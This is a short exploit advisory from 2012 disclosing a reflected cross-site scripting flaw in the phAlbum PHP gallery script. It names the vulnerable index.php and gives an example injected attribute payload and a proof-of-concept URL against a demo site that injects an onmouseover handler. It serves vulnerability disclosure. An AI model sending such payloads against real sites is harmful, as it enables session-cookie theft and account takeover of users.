# Exploit Title: phAlbum php Gallery Script Reflected XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


Issue: Reflected XSS

Risk level: High

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or  
Flash into a vulnerable application to fool a user in order to gather  
data from them. An attacker can steal the session cookie and take over  
the account, impersonating the user. It is also possible to modify the  
content of the page presented to the user.



Vulnerable Page:
index.php (XSS)


Example:
URI was set to #" onmouseover=prompt(928624) //
The input is reflected inside a tag parameter between double quotes.


POC:
http://www.phphq.net/demos/phAlbum/index.php/%F6%22%20onmouseover=document.write%28%22index.html%22%29%20//


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr